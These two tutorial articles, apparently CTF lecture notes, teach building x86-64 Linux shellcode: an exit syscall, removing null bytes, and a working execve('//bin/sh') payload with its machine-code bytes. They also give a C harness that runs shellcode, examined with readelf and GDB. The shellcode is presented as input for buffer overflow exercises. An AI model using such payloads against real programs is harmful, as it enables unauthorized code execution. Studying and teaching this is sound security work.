Build Your Own Shellcode

A shellcode is a piece of compiled code that, when executed, it is going to launch a shell. It is typically given as input to a program to be eventually executed. In this article, I am going to: Introduce background information to understand the overall process Create an assembly program that invoke an exit system call (exitcode) Create an assembly program that invoke a shellcode Background information The shellcode is a piece of code that operates on the lowest level of the system architecture, therefore some important details are architecture dependent. In order to be run on a target system we need to know low level system details of the target architecture. System call A system call is a way to invoke a function that is executed by the kernel. In Linux there are several way to invoke a system call, the most common ones are either by int 0x80 or by syscall. The int 0x80 method is the legacy way of invoking a system call. It is available both on x86 and x64 architectures but in modern architecture should be avoided because it is slower. The syscall is the default way of invoking a system call only available on x64 architectures. To invoke a syscall we need to know how interact with the system because each architecture has its own way to transition to kernel mode. On Ubuntu, the man page is a good place to start: $ man syscall. Here, you can see that each system call has a number associated to it. Under “Architecture calling conventions”, in the first table you can see that the x86-64 architecture requires the system call number to be placed in the rax register and the return value will be placed again in rax. In the second table, you can see in which register you need to place the parameters passed as arguments. To invoke a system call under the x86-64 architecture you need to place the parameters in rdi, rsi, rdx, r10, r8, r9 (in this order). If a system call needs more than 6 parameters you’ll have to place the other parameters on the stack. Now we need to know what are the numbers associated to the system calls. These numbers are defined usually located in the unistd_64.h file for 64 bit architecture (or in unistd_32.h file for 32 bit architecture). In Ubuntu 18.04 64 bit, the system call numbers for 64 bit architecture are in: /usr/src/linux-headers-4.15.0-52-generic/arch/x86/include/generated/uapi/asm/unistd_64.h. (For 32 bit architecture are in: /usr/src/linux-headers-4.15.0-52-generic/arch/x86/include/generated/uapi/asm/unistd_32.h.) Build Simple Example: exitcode In this example, we are going to build an assembly program to invoke the exit system call. Let’s start by looking at the manual $ man exit. (By doing $ man exit you are actually looking at the C function wrapper around the system call but the semantic and order of the parameters are kept.) This function terminates the running program and returns the integer passed as first parameter. To find the number of the exit system call we need to look at the unistd_64.h file. (Looking at the unistd_64.h file, the exit system call number is 60.) The system call number needs to place in the rax register. Now let’s write a simple assembly program with to invoke the exit system call: ; file: exit64.asm global _start section .text _start: mov rax, 0x3c mov rdi, 0x05 syscall In line 6, 0x3c is the hexadecimal number for the decimal number 60 i.e., the exit system call number. In line 7, 0x05 is the 1st parameter of the exit system call (i.e., the value returned when the program ends). Let’s now compile the code as: $ nasm -f elf64 -o exit64.o exit64.asm $ ld -o exit64 exit64.o If we execute the exit64 we can now see that the return value is indeed 5: $ ./exit64 $ echo $? 5 To test this program we can place its machine code into a test program (as in How to Test a Shellcode) To extract the machine code generated we can observe the decompiled code $ objdump -M intel -d exit64 exit64: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <_start>: 400080: b8 3c 00 00 00 mov eax,0x3c 400085: bf 05 00 00 00 mov edi,0x5 40008a: 0f 05 syscall $ The hexadecimal numbers in line 9, 10 and 11 (after the address) are the machine code generated from the assembly instructions that are shown in the same line. This is what you want to copy to the test program, i.e.: b8 3c 00 00 00 bf 05 00 00 00 0f 05. If you want to try to run this exitcode in a C test program follow How to Test a Shellcode. To enter an hexadecimal string into a C string use \x before the number, therefore the exitcode will be \xb8\x3c\x00\x00\x00\xbf\x05\x00\x00\x00\x0f\x05. What happen if you try to give this string in input to a program that has a buffer overflow vulnerability? Will this work? Try it on Basic Stack-Based Buffer Overflow) It will not work. Why? To give this string as input to a program we need few more things to take into account. In C a strings end with the null byte i.e., \0 i.e., \x00. The functions that interact with the user to input data stop when they reach the end of the string. (see man page for ) We can immediately see that the exit code contains a lot of null bytes and therefore the complete code will not be copied entirely by those functions. In circumstances the null bytes are not a problem but this is dependent on the input method used by a program. How to avoid null bytes? Let’s revise the exitcode: ; file: exit64_nnb.asm global _start section .text _start: mov al, 0x3c xor rdi,rdi inc di inc di inc di inc di inc di syscall With objdump we can see that this assembly code does not produce any null bytes: objdump -M intel -d ./exit64_nnb ./exit64_nnb: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <_start>: 400080: b0 3c mov al,0x3c 400082: 48 31 ff xor rdi,rdi 400085: 66 ff c7 inc di 400088: 66 ff c7 inc di 40008b: 66 ff c7 inc di 40008e: 66 ff c7 inc di 400091: 66 ff c7 inc di 400094: 0f 05 syscall This is the code that we are able to give in input to a function that reads input data. Build the shellcode The easiest way to launch a shell is to invoke a the execve system call with the appropriate parameters (see $ man execve). The syscall execve wants 3 parameters. The first points to a string that is the path of the program that needs to be executed. The second parameter is an array of string pointers that point to the command line arguments of the program passed as first parameter. The third parameter is an array of environment variables as string. We want to launch the shell \bin\sh with no arguments. Let’s see the code that opens a shell by invoking an execve: ; file: execve64.asm global _start section .text _start: xor rdi,rdi xor rsi,rsi xor rdx,rdx mov rdi,0x68732f6e69622f2f shr rdi,0x08 push rdi push rsp pop rdi push 0x3b pop rax syscall As described in the Background Information, the system call number needs to be placed in rax, while the parameters in rdi, rsi and then rdx. To correctly fill rdi with the first parameter we need a pointer to the string \bin\sh. This is achieved in line 10, 11 and 12. In line 10, I am moving into rdi the value 0x68732f6e69622f2f. This number is the hexadecimal equivalent of the string hs/nib//. This is the reverse string of //bin/sh (i.e., a shell string). Why the reverse string? If the architecture is little endian a number will be stored in a 8 bytes memory location starting to fill the smallest part of the memory first. In this way the hexadecimal byte 0x68 (of the value 0x68732f6e69622f2f) will be stored in the right most part of a memory, as: After executing line 12, the rsp will point to the first byte of the string, as: (You can see the byte order of your architecture with the command $ lscpu.) In line 11, I am shifting the string by 8 bits to the right. Why? Because this will fill the left hand side of the rdi register with zeros. Why this matter? Because every string in C is null terminated (i.e., terminated by a zero byte). I could have used the value of 0x68732f6e69622f00 in line 10 but this will generate a null byte in the machine code that is better to avoid if we aim to use this code as a string. In line 12, I am pushing the shell string to the stack. Why? On a running program, after executing line 12, the stack pointer register rsp will point to the shell string that is in the stack. For this reason, in line 13 I am saving the address of the stack pointer (rsp) by pushing it to the stack and, in line 14, I am popping out this address to the rdi register (i.e., the first parameter of the execve system call). In line 6,7 and 8 I am cleaning the registers (i.e., setting them to zero). In this way the second and third parameters are already set because we do not need to invoke the shell with any arguments and we do not need environment variables in this case. In line 17 and 18 I am placing the value 0x3b to the register rax because 0x3b is the value of the execve system call (see how to find this number in Background Information). Now, the last thing we need to do is to compile the code and extract the machine code generated, as: $ nasm -f elf64 -o execve64.o execve64.asm $ ld -o execve64 execve64.o $ objdump -M intel -d ./execve64 ./execve64: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <_start>: 400080: 48 31 ff xor rdi,rdi 400083: 48 31 f6 xor rsi,rsi 400086: 48 31 d2 xor rdx,rdx 400089: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f 400090: 2f 73 68 400093: 48 c1 ef 08 shr rdi,0x8 400097: 57 push rdi 400098: 54 push rsp 400099: 5f pop rdi 40009a: 6a 3b push 0x3b 40009c: 58 pop rax 40009d: 0f 05 syscall To test this program we can place its machine code into a test program (as in How to Test a Shellcode). As we can see, there are no null bytes in the generated machine code, therefore this shellcode is suitable to be used as input in a buffer overflow, try it out on Basic Stack-Based Buffer Overflow. There are several ways to generate a shellcode and this one is just an example. The challenge in shellcoding is to write the smallest possible shellcode. This is the end of this shellcoding walkthrough. I hope it was helpful, additional resources follows. Additional resources More to read about syscall: More to read about exit system call:

How to Test a Shellcode

A shellcode is a piece of compiled code that is typically given as input to a program that, when executed, is going to launch a shell (see Build Your Own Shellcode). To test a shellcode we are going to used the following code: // filename: test_shellcode.c char *code = "<shellcodegoeshere>"; int main() { void (*shell)(); shell=(void (*)())code; (*shell)(); } In line 2, we are going to copy the shellcode that we want to test. In line 5, we are declaring the variable shell as a pointer to a function that returns void and that takes no arguments. In line 6, we are casting the string pointer code to the same type of the variable shell (i.e.: a function that returns void and that takes no arguments.) In line 7, we are calling the function pointed by the shell variable (passing no parameters). Once we filled the code variable with the shellcode (in line 1), we can compile the program and run it as: $ gcc -o test_shellcode test_shellcode.c $ ./test_shellcode In this way we can understand if the shellcode will work on the current system. To give a shellcode in input to a program in order to execute it we have to be careful about few more things as explained in Build Your Own Shellcode. Understanding the test program The content pointed by the variable code is going to be allocated in an executable portion of the memory layout. The command $ readelf -a ./test_shellcode gives a lot of information. Let’s try to brake it down for easy to digest. If we examine the symbol tables $ readelf -s ./test_shellcode we can see something like this: Symbol table '.symtab' contains 62 entries: Num: Value Size Type Bind Vis Ndx Name 0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND 1: 0000000000000238 0 SECTION LOCAL DEFAULT 1 2: 0000000000000254 0 SECTION LOCAL DEFAULT 2 3: 0000000000000274 0 SECTION LOCAL DEFAULT 3 ......... 59: 0000000000000000 0 FUNC WEAK DEFAULT UND __cxa_finalize@@GLIBC_2.2 60: 00000000000004d0 0 FUNC GLOBAL DEFAULT 10 _init 61: 0000000000201010 8 OBJECT GLOBAL DEFAULT 22 code In line 10, the symbol code is shown with a Value of 0000000000201010. The Value column represent the address of the symbol. The command $ readelf -S ./test_shellcode shows the header sections of the ELF file: Section Headers: [Nr] Name Type Address Offset Size EntSize Flags Link Info Align [ 0] NULL 0000000000000000 00000000 0000000000000000 0000000000000000 0 0 0 [ 1] .interp PROGBITS 0000000000000238 00000238 000000000000001c 0000000000000000 A 0 0 1 [ 2] .note.ABI-tag NOTE 0000000000000254 00000254 0000000000000020 0000000000000000 A 0 0 4 ...... [21] .got PROGBITS 0000000000200fc0 00000fc0 0000000000000040 0000000000000008 WA 0 0 8 [22] .data PROGBITS 0000000000201000 00001000 0000000000000018 0000000000000000 WA 0 0 8 [23] .bss NOBITS 0000000000201018 00001018 0000000000000008 0000000000000000 WA 0 0 1 Here, we can see that the .data section has an address of 0000000000201000 and a size of 0000000000000018. The symbol code is defined as the address of 0000000000201010 i.e., inside the .data section. We could have gather the same information by running $ objdump -t ./test: SYMBOL TABLE: 0000000000000238 l d .interp 0000000000000000 .interp 0000000000000254 l d .note.ABI-tag 0000000000000000 .note.ABI-tag 0000000000000274 l d 0000000000000000 0000000000000298 l d .gnu.hash 0000000000000000 .gnu.hash 00000000000002b8 l d .dynsym 0000000000000000 .dynsym ...... 0000000000000000 w *UND* 0000000000000000 _ITM_registerTMCloneTable 0000000000000000 w F *UND* 0000000000000000 __cxa_finalize@@GLIBC_2.2.5 00000000000004d0 g F .init 0000000000000000 _init 0000000000201010 g O .data 0000000000000008 code In line 11, we can see that the symbol code is declared in the section .data. To know the permission that a section has, we can have to look at the Program Headers and at the Section to Segment mapping by running $ readelf -a ./test_shellcode: Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040 0x00000000000001f8 0x00000000000001f8 R 0x8 INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238 0x000000000000001c 0x000000000000001c R 0x1 [Requesting program interpreter: /lib64/] LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000818 0x0000000000000818 R E 0x200000 LOAD 0x0000000000000df0 0x0000000000200df0 0x0000000000200df0 0x0000000000000228 0x0000000000000230 RW 0x200000 DYNAMIC 0x0000000000000e00 0x0000000000200e00 0x0000000000200e00 0x00000000000001c0 0x00000000000001c0 RW 0x8 NOTE 0x0000000000000254 0x0000000000000254 0x0000000000000254 0x0000000000000044 0x0000000000000044 R 0x4 GNU_EH_FRAME 0x00000000000006d4 0x00000000000006d4 0x00000000000006d4 0x000000000000003c 0x000000000000003c R 0x4 GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 RW 0x10 GNU_RELRO 0x0000000000000df0 0x0000000000200df0 0x0000000000200df0 0x0000000000000210 0x0000000000000210 R 0x1 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 03 .init_array .fini_array .dynamic .got .data .bss 04 .dynamic 05 .note.ABI-tag 06 .eh_frame_hdr 07 08 .init_array .fini_array .dynamic .got Here we can see that the .data section is mapped into the segment 03 (i.e., the 4th segment). Under the “Program Header” we can count the segments from the top; the first is PHDR segment, the second is INTERP and the fourth is LOAD with permission to read and to write (but not execute!). If we don’t have the execute permission, how come that we are able to run the code?? Let’s run the code in GDB to clarify this point (I am using GEF): Reading symbols from ./test_shellcode...(no debugging symbols found)...done. gef➤ b main Breakpoint 1 at 0x61e gef➤ r Starting program: /home/pippo/ctf/lectures/build_shellcode/test Breakpoint 1, 0x000055555555461e in main () gef➤ info address code Symbol "code" is at 0x555555755010 in a file compiled without debugging. gef➤ x/1g 0x555555755010 0x555555755010 <code>: 0x5555555546c4 gef➤ x/1g 0x5555555546c4 0x5555555546c4: 0x5bf0000003cb8 In line 7, we are printing the address of the global variable code that is located 0x555555755010 (as shown in line 8). This variable is a pointer to the location of memory 0x5555555546c4 (line 10). To understand what are the permission of those different memory locations we can run gef➤ vmmap: gef➤ vmmap Start End Offset Perm Path 0x0000555555554000 0x0000555555555000 0x0000000000000000 r-x /home/pippo/ctf/lectures/build_shellcode/test_shellcode 0x0000555555754000 0x0000555555755000 0x0000000000000000 r-- /home/pippo/ctf/lectures/build_shellcode/test_shellcode 0x0000555555755000 0x0000555555756000 0x0000000000001000 rw- /home/pippo/ctf/lectures/build_shellcode/test_shellcode 0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ 0x00007ffff7bcb000 0x00007ffff7dcb000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/ 0x00007ffff7dcb000 0x00007ffff7dcf000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/ 0x00007ffff7dcf000 0x00007ffff7dd1000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/ 0x00007ffff7dd1000 0x00007ffff7dd5000 0x0000000000000000 rw- 0x00007ffff7dd5000 0x00007ffff7dfc000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ 0x00007ffff7fcd000 0x00007ffff7fcf000 0x0000000000000000 rw- 0x00007ffff7ff7000 0x00007ffff7ffa000 0x0000000000000000 r-- [vvar] 0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x [vdso] 0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000027000 r-- /lib/x86_64-linux-gnu/ 0x00007ffff7ffd000 0x00007ffff7ffe000 0x0000000000028000 rw- /lib/x86_64-linux-gnu/ 0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw- 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack] 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall] (gef➤ vmmap is exactly the same of running cat /proc/{process_id}/maps, where process_id is the process of the debugged program. To obtain the process id of the currently running debugged program run info inferior.) In lines 3,4 and 5 we can see that there are 3 memory regions that map the test_shellcode executable with different permissions. We can see that the variable code (0x555555755010) is located in a memory region that has read and write permissions, in line 5. This is the same information that we obtained previously by reading the ELF file (with the readelf command). We can also see that the address pointed by the variable code (0x5555555546c4) is located in a memory region that has read and execute permission, in line 3. Alternative test code Sometimes over the Internet you see code like this: int main(){ char code[]= "\xb8\x3c\x00\x00\x00\xbf\x05\x00\x00\x00\x0f\x05"; void (*shell)(); shell=(void (*)())code; (*shell)(); //shell(); } Here, the code variable is declared inside the main function and it is NOT a pointer. This code WILL NOT work if compiled with: $ gcc -o test_shellcode ./test_shellcode.c The code will compile correctly but it will produce Segmentation fault when executed. The reason is simple, the code variable is located in the stack and since it is a non-executable memory region, if an instruction tries to execute from here the system will produce a segmentation fault. This code WILL work if compiled by passing the flag to make the stack executable: $ gcc -o test_shellcode -z execstack ./test_shellcode.c (Alternatively we can also use the execstack tool to change the executable stack flag of an ELF file.)